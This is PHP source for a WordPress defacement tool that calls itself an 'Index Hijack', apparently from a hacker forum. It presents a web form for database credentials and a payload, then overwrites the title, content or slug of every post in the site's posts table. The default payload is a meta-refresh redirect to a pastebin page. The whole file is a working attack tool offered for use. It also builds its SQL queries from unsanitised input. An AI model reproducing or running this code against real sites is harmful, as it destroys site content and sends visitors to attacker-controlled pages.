[PHP] Wordpress Index Hijack Priv8

<?php
echo '<form method="POST">
<p align="center"> 
<img border="0" src="http://oi59.tinypic.com/33uucdu.jpg"></p>
<center><font color="red" size="6" face="impact">Wordpress Index Hijack Priv8</font></center>
<center><font color="red" size="2" face="orion">Coded By Mauritania Attacker</font></center>
<center><input type="text" value="localhost" name="pghost">
<input type="text" value="database_name" name="dbnmn">
<input type="text" value="prefix" name="prefix">
<input type="text" value="username_db" name="dbusrrrr">
<input type="text" value="password_db" name="pwddbbn"></center><br>
<center><textarea name="pown" cols="85" rows="10"><meta http-equiv="refresh" content="0;URL=http://pastebin.com/raw.php?i=WG1zASMG"></textarea><br>
<input type="submit" name="up2" value="Hijack Index"><br></center><form>';
$pghost = $_POST['pghost'];
$dbnmn = $_POST['dbnmn'];
$dbusrrrr = $_POST['dbusrrrr'];
$pwddbbn = $_POST['pwddbbn'];
$index = stripslashes($_POST['pown']);
$prefix = $_POST['prefix'];
//$prefix = "wp_";
if ($_POST['up2']) {
@mysql_connect($pghost, $dbusrrrr, $pwddbbn) or die(mysql_error());
@mysql_select_db($dbnmn) or die(mysql_error());
$tableName = $prefix . "posts";
$ghost1 = mysql_query("UPDATE $tableName SET post_title ='" . $index . "' WHERE ID > 0 ");
if (!$ghost1) {
$ghost2 = mysql_query("UPDATE $tableName SET post_content ='" . $index . "' WHERE ID > 0 ");
} elseif (!$ghost2) {
$ghost3 = mysql_query("UPDATE $tableName SET post_name ='" . $index . "' WHERE ID > 0 ");
}
mysql_close();
if ($ghost1 || $ghost2 || $ghost3) {
echo "<center><p><b><font color='red'>Index Website Have been Hijacked Successfully</font></p></b></center>";
} else {
echo "<center><p><b><font color='red'>Failed To Hijack the Website :(</font></p></b></center>";
}
}
?>